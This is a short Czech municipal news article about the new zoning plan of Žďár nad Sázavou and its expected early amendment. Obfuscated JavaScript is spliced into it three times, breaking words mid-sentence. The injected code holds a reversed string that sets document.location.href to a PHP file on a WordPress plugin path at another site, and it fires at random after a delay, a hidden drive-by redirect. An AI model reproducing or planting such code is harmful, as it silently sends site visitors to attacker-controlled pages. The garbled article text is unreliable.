Rainbow page separator

Pět let chystaný územní plán bude za pár let potřebovat změnu

Pondělí, 26. září 2016

Městský úřad Žďár nad Sázavou

Žďár nad Sázavou / Především potřeby města z hlediska rozšiřování ploch pro průmyslovou výrobu, individuální i by[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tovou výstavbu a rovněž některé dopravní úpravy řeší nový územní plán Žďáru nad Sázavou. Předchozí plán byl schválen již v roce 2003. Nový územní plán Žďáru se začal připravovat v roce 2011 a v letech 2013, 2014 a 2016 se uskutečnila veřejná jednání, kde mohli lidé vznášet připomínky a námitky k navrženému řešení, s nimiž se poté bylo nutné vypořádat.
Už nyní je však podle vedení žďárské radnice zřejmé, že v novém územním plánu jsou s ohledem na vývoj ve městě po dobu jeho tvorby a postupných úprav třeba změny. „Už dnes se objevuje řada dalších problémů, které již nebylo možné nějakým způsobem do územního plánu vtělit. Budeme pro[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to chtít připravovat změnu územního plánu na podkladě koncepčních materiálů. To znamená, že budeme chystat generel dopravy ve městě a zabývat se některými územími z pohledu územních studií, abychom věděli, jaké jsou jejich možnosti,“ informoval starosta Žďáru nad Sázavou Zdeněk Navrátil. Změnu územního plánu měs[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to odhaduje v horizontu dvou až tří let.